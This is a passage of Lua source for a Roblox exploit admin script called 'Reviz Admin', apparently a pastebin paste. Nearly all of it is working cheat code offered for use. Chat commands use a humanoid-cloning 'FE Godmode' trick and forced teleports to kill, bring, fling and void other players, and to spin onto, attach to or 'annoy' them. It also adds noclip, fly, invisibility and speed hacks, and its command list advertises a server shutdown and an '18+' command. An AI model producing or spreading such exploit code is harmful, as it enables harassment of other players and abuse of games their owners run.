for when you want to reset with FE Godmode,\n[76] explorer -- Loads up DEX,\n[77] reset -- Resets your character.,\n[78] anim [id] -- Applies an animation on you, must be created by ROBLOX,\n[79] animgui -- Loads up Energize animations GUI,\n[80] savepos -- Saves your current position,\n[81] loadpos -- Teleports you to your saved position,\n[82] bang [plr] -- 18+,\n[83] unbang,\n[84] delcmdbar -- Removes the command bar completely,\n[85] bringmod [obj] -- Brings all the parts in a model, client only, comes from ;bringobj enter exact name of model,\n[86] shutdown -- Uses harkinians script to shutdown server,\n[87] respawn -- If grespawn doesnt work you can use respawn,\n[88] delobj [obj] -- Deletes a certain brick in workspace, client sided,\n[89] getplrs -- Prints all players in game,\n[90] deldecal -- Deletes all decals client sided,\n[91] opfinality -- Loads in my FE GUI Opfinality,\n[92] remotes -- Prints all remotes in the game in the console when added,\n[93] noremotes -- Stops printing remotes,\n[94] tpdefault -- Stops all loop teleports to a player,\n[95] stopsit -- Will not allow you to sit,\n[96] gosit -- Allows you to sit,\n[97] clicktp -- Enables click tp,\n[98] noclicktp -- Disables click tp,\n[99] toolson -- If any tools are dropped in the workspace you will automatically get them,\n[100] toolsoff -- Stops ;toolson,\n[101] version -- Gets the admin version, \n This list of commands is NOT showing everything, go to my thread in the pastebin link to see ALL commands."
  590. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  591. TextLabel.TextSize = 15
  592. TextLabel.TextWrapped = true
  593. TextLabel.TextXAlignment = Enum.TextXAlignment.Left
  594. TextLabel.TextYAlignment = Enum.TextYAlignment.Top
  595. closegui.Name = "closegui"
  596. closegui.Parent = CMDSFRAME
  597. closegui.BackgroundColor3 = Color3.new(0.890196, 0.223529, 0.0588235)
  598. closegui.BorderSizePixel = 0
  599. closegui.Position = UDim2.new(0.995000005, 0, 0, 0)
  600. closegui.Size = UDim2.new(0.0545952693, 0, 0.0728644878, 0)
  601. closegui.Font = Enum.Font.SourceSansBold
  602. closegui.FontSize = Enum.FontSize.Size24
  603. closegui.Text = "X"
  604. closegui.TextColor3 = Color3.new(1, 1, 1)
  605. closegui.TextSize = 20
  606.  
  607. closegui.MouseButton1Click:connect(function()
  608.     CMDSFRAME.Visible = false
  609. end)
  610.  
  611. game:GetService('RunService').Stepped:connect(function()
  612.     if spin then
  613.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[spinplr.Name].Character.HumanoidRootPart.CFrame
  614.     end
  615.     if followed then
  616.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[flwplr.Name].Character.HumanoidRootPart.CFrame + game:GetService("Players")[flwplr.Name].Character.HumanoidRootPart.CFrame.lookVector * -5
  617.     end
  618.     if traill then
  619.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[trlplr.Name].Character.HumanoidRootPart.CFrame + game:GetService("Players")[trlplr.Name].Character.HumanoidRootPart.CFrame.lookVector * 5
  620.     end
  621.     if annoying then
  622.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[annplr.Name].Character.HumanoidRootPart.CFrame
  623.     end
  624.     if hwalk then
  625.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[hdwplr.Name].Character.HumanoidRootPart.CFrame + Vector3.new(0, 4, 0)
  626.     end
  627.     if staring then
  628.         lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(lplayer.Character.Torso.Position, game:GetService("Players")[stareplr.Name].Character.Torso.Position)
  629.     end
  630. end)
  631. game:GetService('RunService').Stepped:connect(function()
  632.     if noclip then
  633.         if lplayer.Character.Humanoid.RigType == Enum.HumanoidRigType.R6 then
  634.             lplayer.Character.Head.CanCollide = false
  635.             lplayer.Character.Torso.CanCollide = false
  636.             lplayer.Character["Left Leg"].CanCollide = false
  637.             lplayer.Character["Right Leg"].CanCollide = false
  638.         else
  639.             lplayer.Character.Humanoid:ChangeState(11)
  640.         end
  641.     end
  642.     if changingstate then
  643.         lplayer.Character.Humanoid:ChangeState(statechosen)
  644.     end
  645. end)
  646. game:GetService('RunService').Stepped:connect(function()
  647.     if droppinghats then
  648.         for i,v in pairs(lplayer.Character:GetChildren()) do
  649.             if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  650.                 v.Parent = workspace
  651.             end
  652.         end
  653.     end
  654.     if droppingtools then
  655.         for i,v in pairs(lplayer.Character:GetChildren()) do
  656.             if (v:IsA("Tool")) then
  657.                 v.Parent = workspace
  658.             end
  659.         end
  660.     end
  661.     if removingmeshhats then
  662.         for i,v in pairs(lplayer.Character:GetChildren()) do
  663.             if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  664.                 v.Handle.Mesh:Destroy()
  665.             end
  666.         end
  667.     end
  668.     if removingmeshtool then
  669.         for i,v in pairs(lplayer.Character:GetChildren()) do
  670.             if (v:IsA("Tool")) then
  671.                 v.Handle.Mesh:Destroy()
  672.             end
  673.         end
  674.     end
  675. end)
  676. game:GetService('RunService').Stepped:connect(function()
  677.     if banpl then
  678.         lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[bplrr].Character.HumanoidRootPart.CFrame
  679.     end
  680. end)
  681. game:GetService('RunService').Stepped:connect(function()
  682.     if stopsitting then
  683.         lplayer.Character.Humanoid.Sit = false
  684.     end
  685. end)
  686.  
  687. plr = lplayer
  688. hum = plr.Character.HumanoidRootPart
  689. mouse = plr:GetMouse()
  690. mouse.KeyDown:connect(function(key)
  691.     if key == "e" then
  692.         if mouse.Target then
  693.             if clickgoto then
  694.                 hum.CFrame = CFrame.new(mouse.Hit.x, mouse.Hit.y + 5, mouse.Hit.z)
  695.             elseif clickdel then
  696.                 mouse.Target:Destroy()
  697.             end
  698.         end
  699.     end
  700. end)
  701.  
  702. game:GetService("Workspace").ChildAdded:connect(function(part)
  703.     if gettingtools then
  704.         if part:IsA("Tool") then
  705.             part.Handle.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  706.         end
  707.     end
  708. end)
  709.  
  710. lplayer.Chatted:Connect(function(msg)
  711.     if string.sub(msg, 1, 6) == (prefix.."kill ") then
  712.         if string.sub(msg, 7) == "me" then
  713.             lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(100000,0,100000)
  714.         else
  715.             for i,v in pairs(GetPlayer(string.sub(msg, 7)))do
  716.                 local NOW = lplayer.Character.HumanoidRootPart.CFrame
  717.                 lplayer.Character.Humanoid.Name = 1
  718.                 local l = lplayer.Character["1"]:Clone()
  719.                 l.Parent = lplayer.Character
  720.                 l.Name = "Humanoid"
  721.                 wait(0.1)
  722.                 lplayer.Character["1"]:Destroy()
  723.                 game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  724.                 lplayer.Character.Animate.Disabled = true
  725.                 wait(0.1)
  726.                 lplayer.Character.Animate.Disabled = false
  727.                 lplayer.Character.Humanoid.DisplayDistanceType = "None"
  728.                 for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  729.                 lplayer.Character.Humanoid:EquipTool(v)
  730.                 end
  731.                 local function tp(player,player2)
  732.                 local char1,char2=player.Character,player2.Character
  733.                 if char1 and char2 then
  734.                 char1:MoveTo(char2.Head.Position)
  735.                 end
  736.                 end
  737.                 wait(0.1)
  738.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  739.                 wait(0.2)
  740.                 lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  741.                 wait(0.5)
  742.                 lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-100000,10,-100000))
  743.                 wait(0.7)
  744.                 tp(lplayer,game:GetService("Players")[v.Name])
  745.                 wait(0.7)
  746.                 lplayer.Character.HumanoidRootPart.CFrame = NOW
  747.                 game:GetService("StarterGui"):SetCore("SendNotification", {
  748.                 Title = "Tools needed!";
  749.                 Text = "You need a tool in your backpack for this command!";
  750.                 })
  751.             end
  752.         end
  753.     end
  754.     if string.sub(msg, 1, 7) == (prefix.."bring ") then
  755.         for i,v in pairs(GetPlayer(string.sub(msg, 8)))do
  756.             local NOW = lplayer.Character.HumanoidRootPart.CFrame
  757.             lplayer.Character.Humanoid.Name = 1
  758.             local l = lplayer.Character["1"]:Clone()
  759.             l.Parent = lplayer.Character
  760.             l.Name = "Humanoid"
  761.             wait(0.1)
  762.             lplayer.Character["1"]:Destroy()
  763.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  764.             lplayer.Character.Animate.Disabled = true
  765.             wait(0.1)
  766.             lplayer.Character.Animate.Disabled = false
  767.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  768.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  769.             lplayer.Character.Humanoid:EquipTool(v)
  770.             end
  771.             local function tp(player,player2)
  772.             local char1,char2=player.Character,player2.Character
  773.             if char1 and char2 then
  774.             char1.HumanoidRootPart.CFrame = char2.HumanoidRootPart.CFrame
  775.             end
  776.             end
  777.             local function getout(player,player2)
  778.             local char1,char2=player.Character,player2.Character
  779.             if char1 and char2 then
  780.             char1:MoveTo(char2.Head.Position)
  781.             end
  782.             end
  783.             tp(game:GetService("Players")[v.Name], lplayer)
  784.             wait(0.2)
  785.             tp(game:GetService("Players")[v.Name], lplayer)
  786.             wait(0.5)
  787.             lplayer.Character.HumanoidRootPart.CFrame = NOW
  788.             wait(0.5)
  789.             getout(lplayer, game:GetService("Players")[v.Name])
  790.             wait(0.3)
  791.             lplayer.Character.HumanoidRootPart.CFrame = NOW
  792.             game:GetService("StarterGui"):SetCore("SendNotification", {
  793.             Title = "Tools needed!";
  794.             Text = "You need a tool in your backpack for this command!";
  795.             })
  796.         end
  797.     end
  798.     if string.sub(msg, 1, 6) == (prefix.."spin ") then
  799.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  800.             lplayer.Character.Humanoid.Name = 1
  801.             local l = lplayer.Character["1"]:Clone()
  802.             l.Parent = lplayer.Character
  803.             l.Name = "Humanoid"
  804.             wait(0.1)
  805.             lplayer.Character["1"]:Destroy()
  806.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  807.             lplayer.Character.Animate.Disabled = true
  808.             wait(0.1)
  809.             lplayer.Character.Animate.Disabled = false
  810.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  811.             lplayer.Character.Animate.Disabled = false
  812.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  813.             lplayer.Character.Humanoid:EquipTool(v)
  814.             end
  815.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  816.             spinplr = v
  817.             wait(0.5)
  818.             spin = true
  819.             game:GetService("StarterGui"):SetCore("SendNotification", {
  820.             Title = "Tools needed!";
  821.             Text = "You need a tool in your backpack for this command!";
  822.             })
  823.         end
  824.     end
  825.     if string.sub(msg, 1, 7) == (prefix.."unspin") then
  826.         spin = false
  827.     end
  828.     if string.sub(msg, 1, 8) == (prefix.."attach ") then
  829.         for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  830.             lplayer.Character.Humanoid.Name = 1
  831.             local l = lplayer.Character["1"]:Clone()
  832.             l.Parent = lplayer.Character
  833.             l.Name = "Humanoid"
  834.             wait(0.1)
  835.             lplayer.Character["1"]:Destroy()
  836.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  837.             lplayer.Character.Animate.Disabled = true
  838.             wait(0.1)
  839.             lplayer.Character.Animate.Disabled = false
  840.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  841.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  842.             lplayer.Character.Humanoid:EquipTool(v)
  843.             end
  844.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  845.             wait(0.3)
  846.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character["Left Arm"].CFrame
  847.             attplr = v
  848.             game:GetService("StarterGui"):SetCore("SendNotification", {
  849.             Title = "Tools needed!";
  850.             Text = "You need a tool in your backpack for this command!";
  851.             })
  852.         end
  853.     end
  854.     if string.sub(msg, 1, 10) == (prefix.."unattach ") then
  855.         for i,v in pairs(GetPlayer(string.sub(msg, 11))) do
  856.             local function getout(player,player2)
  857.             local char1,char2=player.Character,player2.Character
  858.             if char1 and char2 then
  859.             char1:MoveTo(char2.Head.Position)
  860.             end
  861.             end
  862.             getout(lplayer, game:GetService("Players")[v.Name])
  863.         end
  864.     end
  865.     if string.sub(msg, 1, 8) == (prefix.."follow ") then
  866.         for i,v in pairs(GetPlayer(string.sub(msg, 9))) do
  867.             followed = true
  868.             flwplr = v
  869.         end
  870.     end
  871.     if string.sub(msg, 1, 9) == (prefix.."unfollow") then
  872.         followed = false
  873.     end
  874.     if string.sub(msg, 1, 10) == (prefix.."freefall ") then
  875.         for i,v in pairs(GetPlayer(string.sub(msg, 11))) do
  876.             local NOW = lplayer.Character.HumanoidRootPart.CFrame
  877.             lplayer.Character.Humanoid.Name = 1
  878.             local l = lplayer.Character["1"]:Clone()
  879.             l.Parent = lplayer.Character
  880.             l.Name = "Humanoid"
  881.             wait(0.1)
  882.             lplayer.Character["1"]:Destroy()
  883.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  884.             lplayer.Character.Animate.Disabled = true
  885.             wait(0.1)
  886.             lplayer.Character.Animate.Disabled = false
  887.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  888.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  889.             lplayer.Character.Humanoid:EquipTool(v)
  890.             end
  891.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  892.             wait(0.2)
  893.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  894.             wait(0.6)
  895.             lplayer.Character.HumanoidRootPart.CFrame = NOW
  896.             wait(0.6)
  897.             lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(0,50000,0)
  898.             game:GetService("StarterGui"):SetCore("SendNotification", {
  899.             Title = "Tools needed!";
  900.             Text = "You need a tool in your backpack for this command!";
  901.             })
  902.         end
  903.     end
  904.     if string.sub(msg, 1, 7) == (prefix.."trail ") then
  905.         for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  906.             traill = true
  907.             trlplr = v
  908.         end
  909.     end
  910.     if string.sub(msg, 1, 8) == (prefix.."untrail") then
  911.         traill = false
  912.     end
  913.     if string.sub(msg, 1, 7) == (prefix.."orbit ") then
  914.         if string.sub(msg, 8) == "all" or string.sub(msg, 8) == "others" or string.sub(msg, 8) == "me" then
  915.             lplayer.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  916.         else
  917.             for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  918.                 local o = Instance.new("RocketPropulsion")
  919.                 o.Parent = lplayer.Character.HumanoidRootPart
  920.                 o.Name = "Orbit"
  921.                 o.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart
  922.                 o:Fire()
  923.                 noclip = true
  924.             end
  925.         end
  926.     end
  927.     if string.sub(msg, 1, 8) == (prefix.."unorbit") then
  928.         lplayer.Character.HumanoidRootPart.Orbit:Destroy()
  929.         noclip = false
  930.     end
  931.     if string.sub(msg, 1, 7) == (prefix.."fling ") then
  932.         if string.sub(msg, 8) == "all" or string.sub(msg, 8) == "others" or string.sub(msg, 8) == "me" then
  933.             lplayer.Character.HumanoidRootPart.CFrame = lplayer.Character.HumanoidRootPart.CFrame
  934.         else
  935.             for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  936.                 local y = Instance.new("RocketPropulsion")
  937.                 y.Parent = lplayer.Character.HumanoidRootPart
  938.                 y.CartoonFactor = 1
  939.                 y.MaxThrust = 800000
  940.                 y.MaxSpeed = 1000
  941.                 y.ThrustP = 200000
  942.                 y.Name = "Fling"
  943.                 game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head
  944.                 y.Target = game:GetService("Players")[v.Name].Character.HumanoidRootPart
  945.                 y:Fire()
  946.                 noclip = true
  947.             end
  948.         end
  949.     end
  950.     if string.sub(msg, 1, 8) == (prefix.."unfling") then
  951.         noclip = false
  952.         lplayer.Character.HumanoidRootPart.Fling:Destroy()
  953.         game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Head
  954.         wait(0.4)
  955.         lplayer.Character.HumanoidRootPart.Fling:Destroy()
  956.     end
  957.     if string.sub(msg, 1, 8) == (prefix.."fecheck") then
  958.         if game:GetService("Workspace").FilteringEnabled == true then
  959.             warn("FE is Enabled (Filtering Enabled)")
  960.             game:GetService("StarterGui"):SetCore("SendNotification", {
  961.                 Title = "FE is Enabled";
  962.                 Text = "Filtering Enabled. Enjoy using Reviz Admin!";
  963.             })
  964.         else
  965.             warn("FE is Disabled (Filtering Disabled) Consider using a different admin script.")
  966.             game:GetService("StarterGui"):SetCore("SendNotification", {
  967.                 Title = "FE is Disabled";
  968.                 Text = "Filtering Disabled. Consider using a different admin script.";
  969.             })
  970.         end
  971.     end
  972.     if string.sub(msg, 1, 6) == (prefix.."void ") then
  973.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  974.             lplayer.Character.Humanoid.Name = 1
  975.             local l = lplayer.Character["1"]:Clone()
  976.             l.Parent = lplayer.Character
  977.             l.Name = "Humanoid"
  978.             wait(0.1)
  979.             lplayer.Character["1"]:Destroy()
  980.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  981.             lplayer.Character.Animate.Disabled = true
  982.             wait(0.1)
  983.             lplayer.Character.Animate.Disabled = false
  984.             lplayer.Character.Humanoid.DisplayDistanceType = "None"
  985.             for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
  986.             lplayer.Character.Humanoid:EquipTool(v)
  987.             end
  988.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  989.             wait(0.2)
  990.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  991.             wait(0.6)
  992.             lplayer.Character.HumanoidRootPart.CFrame = CFrame.new(999999999999999,0,999999999999999)
  993.             game:GetService("StarterGui"):SetCore("SendNotification", {
  994.             Title = "Tools needed!";
  995.             Text = "You need a tool in your backpack for this command!";
  996.             })
  997.         end
  998.     end
  999.     if string.sub(msg, 1, 7) == (prefix.."noclip") then
  1000.         noclip = true
  1001.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1002.         Title = "Noclip enabled";
  1003.         Text = "Type ;clip to disable";
  1004.         })
  1005.     end
  1006.     if string.sub(msg, 1, 5) == (prefix.."clip") then
  1007.         noclip = false
  1008.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1009.         Title = "Noclip disabled";
  1010.         Text = "Type ;noclip to enable";
  1011.         })
  1012.     end
  1013.     if string.sub(msg, 1, 7) == (prefix.."speed ") then
  1014.         lplayer.Character.Humanoid.WalkSpeed = (string.sub(msg, 8))
  1015.     end
  1016.     if string.sub(msg, 1, 4) == (prefix.."ws ") then
  1017.         lplayer.Character.Humanoid.WalkSpeed = (string.sub(msg, 5))
  1018.     end
  1019.     if string.sub(msg, 1, 11) == (prefix.."hipheight ") then
  1020.         lplayer.Character.Humanoid.HipHeight = (string.sub(msg, 12))
  1021.     end
  1022.     if string.sub(msg, 1, 4) == (prefix.."hh ") then
  1023.         lplayer.Character.Humanoid.HipHeight = (string.sub(msg, 5))
  1024.     end
  1025.     if string.sub(msg, 1, 11) == (prefix.."jumppower ") then
  1026.         lplayer.Character.Humanoid.JumpPower = (string.sub(msg, 12))
  1027.     end
  1028.     if string.sub(msg, 1, 4) == (prefix.."jp ") then
  1029.         lplayer.Character.Humanoid.JumpPower = (string.sub(msg, 5))
  1030.     end
  1031.     if string.sub(msg, 1, 8) == (prefix.."default") then
  1032.         lplayer.Character.Humanoid.JumpPower = 50
  1033.         lplayer.Character.Humanoid.WalkSpeed = 16
  1034.         lplayer.Character.Humanoid.HipHeight = 0
  1035.     end
  1036.     if string.sub(msg, 1, 7) == (prefix.."annoy ") then
  1037.         for i,v in pairs(GetPlayer(string.sub(msg, 8))) do
  1038.             annoying = true
  1039.             annplr = v
  1040.         end
  1041.     end
  1042.     if string.sub(msg, 1, 8) == (prefix.."unannoy") then
  1043.         annoying = false
  1044.     end
  1045.     if string.sub(msg, 1, 10) == (prefix.."headwalk ") then
  1046.         for i,v in pairs(GetPlayer(string.sub(msg, 11))) do
  1047.             hwalk = true
  1048.             hdwplr = v
  1049.         end
  1050.     end
  1051.     if string.sub(msg, 1, 11) == (prefix.."unheadwalk") then
  1052.         hwalk = false
  1053.     end
  1054.     if string.sub(msg, 1, 8) == (prefix.."nolimbs") then
  1055.         lplayer.Character["Left Leg"]:Destroy()
  1056.         lplayer.Character["Left Arm"]:Destroy()
  1057.         lplayer.Character["Right Leg"]:Destroy()
  1058.         lplayer.Character["Right Arm"]:Destroy()
  1059.     end
  1060.     if string.sub(msg, 1, 4) == (prefix.."god") then
  1061.         lplayer.Character.Humanoid.Name = 1
  1062.         local l = lplayer.Character["1"]:Clone()
  1063.         l.Parent = lplayer.Character
  1064.         l.Name = "Humanoid"
  1065.         wait(0.1)
  1066.         lplayer.Character["1"]:Destroy()
  1067.         game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character
  1068.         lplayer.Character.Animate.Disabled = true
  1069.         wait(0.1)
  1070.         lplayer.Character.Animate.Disabled = false
  1071.         lplayer.Character.Humanoid.DisplayDistanceType = "None"
  1072.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1073.         Title = "FE Godmode enabled";
  1074.         Text = "Use ;grespawn or ;respawn to remove";
  1075.         })
  1076.     end
  1077.     if string.sub(msg, 1, 9) == (prefix.."drophats") then
  1078.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1079.             if (v:IsA("Accessory")) or (v:IsA("Hat")) then
  1080.                 v.Parent = workspace
  1081.             end
  1082.         end
  1083.     end
  1084.     if string.sub(msg, 1, 9) == (prefix.."droptool") then
  1085.         for i,v in pairs(lplayer.Character:GetChildren()) do
  1086.             if (v:IsA("Tool")) then
  1087.                 v.Parent = workspace
  1088.             end
  1089.         end
  1090.     end
  1091.     if string.sub(msg, 1, 10) == (prefix.."loopdhats") then
  1092.         droppinghats = true
  1093.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1094.         Title = "Loop Drop Enabled";
  1095.         Text = "Type ;unloopdhats to disable";
  1096.         })
  1097.     end
  1098.     if string.sub(msg, 1, 12) == (prefix.."unloopdhats") then
  1099.         droppinghats = false
  1100.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1101.         Title = "Loop Drop Disabled";
  1102.         Text = "Type ;loopdhats to enable.";
  1103.         })
  1104.     end
  1105.     if string.sub(msg, 1, 10) == (prefix.."loopdtool") then
  1106.         droppingtools = true
  1107.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1108.         Title = "Loop Drop Enabled";
  1109.         Text = "Type ;unloopdtool to disable";
  1110.         })
  1111.     end
  1112.     if string.sub(msg, 1, 12) == (prefix.."unloopdtool") then
  1113.         droppingtools = false
  1114.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1115.         Title = "Loop Drop Disabled";
  1116.         Text = "Type ;loopdtool to enable.";
  1117.         })
  1118.     end
  1119.     if string.sub(msg, 1, 10) == (prefix.."invisible") then -- Credit to Timeless
  1120.         Local = game:GetService('Players').LocalPlayer
  1121.         Char  = Local.Character
  1122.         touched,tpdback = false, false
  1123.         box = Instance.new('Part',workspace)
  1124.         box.Anchored = true
  1125.         box.CanCollide = true
  1126.         box.Size = Vector3.new(10,1,10)
  1127.         box.Position = Vector3.new(0,10000,0)
  1128.         box.Touched:connect(function(part)
  1129.             if (part.Parent.Name == Local.Name) then
  1130.                 if touched == false then
  1131.                     touched = true
  1132.                     function apply()
  1133.                         if script.Disabled ~= true then
  1134.                             no = Char.HumanoidRootPart:Clone()
  1135.                             wait(.25)
  1136.                             Char.HumanoidRootPart:Destroy()
  1137.                             no.Parent = Char
  1138.                             Char:MoveTo(loc)
  1139.                             touched = false
  1140.                         end end
  1141.                     if Char then
  1142.                         apply()
  1143.                     end
  1144.                 end
  1145.             end
  1146.         end)
  1147.         repeat wait() until Char
  1148.         loc = Char.HumanoidRootPart.Position
  1149.         Char:MoveTo(box.Position + Vector3.new(0,.5,0))
  1150.         game:GetService("StarterGui"):SetCore("SendNotification", {
  1151.         Title = "Invisibility enabled!";
  1152.         Text = "Reset or use ;respawn to remove.";
  1153.         })
  1154.     end
  1155.     if string.sub(msg, 1, 6) == (prefix.."view ") then
  1156.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  1157.             if game:GetService("Players")[v.Name].Character.Humanoid then
  1158.                 game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Humanoid
  1159.             else
  1160.                 game:GetService("Workspace").CurrentCamera.CameraSubject = game:GetService("Players")[v.Name].Character.Head
  1161.             end
  1162.         end
  1163.     end
  1164.     if string.sub(msg, 1, 7) == (prefix.."unview") then
  1165.         if lplayer.Character.Humanoid then
  1166.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Humanoid
  1167.         else
  1168.             game:GetService("Workspace").CurrentCamera.CameraSubject = lplayer.Character.Head
  1169.         end
  1170.     end
  1171.     if string.sub(msg, 1, 6) == (prefix.."goto ") then
  1172.         for i,v in pairs(GetPlayer(string.sub(msg, 7))) do
  1173.             lplayer.Character.HumanoidRootPart.CFrame = game:GetService("Players")[v.Name].Character.HumanoidRootPart.CFrame
  1174.         end
  1175.     end
  1176.     if string.sub(msg, 1, 4) == (prefix.."fly") then
  1177.     repeat wait() until lplayer and lplayer.Character and lplayer.Character:FindFirstChild('HumanoidRootPart') and lplayer.Character:FindFirstChild('Humanoid')
  1178.     repeat wait() until Mouse
  1179.    
  1180.     local T = lplayer.Character.HumanoidRootPart
  1181.     local CONTROL = {F = 0, B = 0, L = 0, R = 0}
  1182.     local lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  1183.     local SPEED = speedget
  1184.    
  1185.     local function fly()
  1186.         flying = true
  1187.         local BG = Instance.new('BodyGyro', T)
  1188.         local BV = Instance.new('BodyVelocity', T)
  1189.         BG.P = 9e4
  1190.         BG.maxTorque = Vector3.new(9e9, 9e9, 9e9)
  1191.         BG.cframe = T.CFrame
  1192.         BV.velocity = Vector3.new(0, 0.1, 0)
  1193.         BV.maxForce = Vector3.new(9e9, 9e9, 9e9)
  1194.         spawn(function()
  1195.         repeat wait()
  1196.         lplayer.Character.Humanoid.PlatformStand = true
  1197.         if CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0 then
  1198.         SPEED = 50
  1199.         elseif not (CONTROL.L + CONTROL.R ~= 0 or CONTROL.F + CONTROL.B ~= 0) and SPEED ~= 0 then
  1200.         SPEED = 0
  1201.         end
  1202.         if (CONTROL.L + CONTROL.R) ~= 0 or (CONTROL.F + CONTROL.B) ~= 0 then
  1203.         BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (CONTROL.F + CONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(CONTROL.L + CONTROL.R, (CONTROL.F + CONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  1204.         lCONTROL = {F = CONTROL.F, B = CONTROL.B, L = CONTROL.L, R = CONTROL.R}
  1205.         elseif (CONTROL.L + CONTROL.R) == 0 and (CONTROL.F + CONTROL.B) == 0 and SPEED ~= 0 then
  1206.         BV.velocity = ((workspace.CurrentCamera.CoordinateFrame.lookVector * (lCONTROL.F + lCONTROL.B)) + ((workspace.CurrentCamera.CoordinateFrame * CFrame.new(lCONTROL.L + lCONTROL.R, (lCONTROL.F + lCONTROL.B) * 0.2, 0).p) - workspace.CurrentCamera.CoordinateFrame.p)) * SPEED
  1207.         else
  1208.         BV.velocity = Vector3.new(0, 0.1, 0)
  1209.         end
  1210.         BG.cframe = workspace.CurrentCamera.CoordinateFrame
  1211.                 until not flying
  1212.                 CONTROL = {F = 0, B = 0, L = 0, R = 0}
  1213.                 lCONTROL = {F = 0, B = 0, L = 0, R = 0}
  1214.                 SPEED = 0
  1215.                 BG:destroy()
  1216.                 BV:destroy()
  1217.                 lplayer.Character.Humanoid.PlatformStand = false
  1218.             end)
  1219.         end
  1220.     Mouse.KeyDown:connect(function(KEY)
  1221.         if KEY:lower() == 'w' then
  1222.             CONTROL.F = speedfly
  1223.         elseif KEY:lower() == 's' then
  1224.             CONTROL.B = -speedfly
  1225.         elseif KEY:lower() == 'a' then
  1226.             CONTROL.L = -speedfly
  1227.         elseif KEY:lower() == 'd' then
  1228.             CONTROL.R = speedfly
  1229.         end
  1230.     end)
  1231.     Mouse.KeyUp:connect(function(KEY)
  1232.         if KEY:lower() == 'w' then
  1233.             CONTROL.F = 0
  1234.         elseif KEY:lower() == 's' then
  1235.             CONTROL.B = 0
  1236.         elseif KEY:lower() == 'a' then
  1237.             CONTROL.L = 0
  1238.         elseif KEY:lower() == 'd' then
  1239.             CONTROL.R = 0
  1240.         end
  1241.     end)
  1242.     fly()
  1243.     end
  1244.     if string.sub(msg, 1, 6) == (prefix.."unfly") then
  1245.         flying = false
  1246.         lplayer.Character.Humanoid.PlatformStand = false
  1247.     end
  1248.     if string.sub(msg, 1, 6) == (prefix.."chat ") then
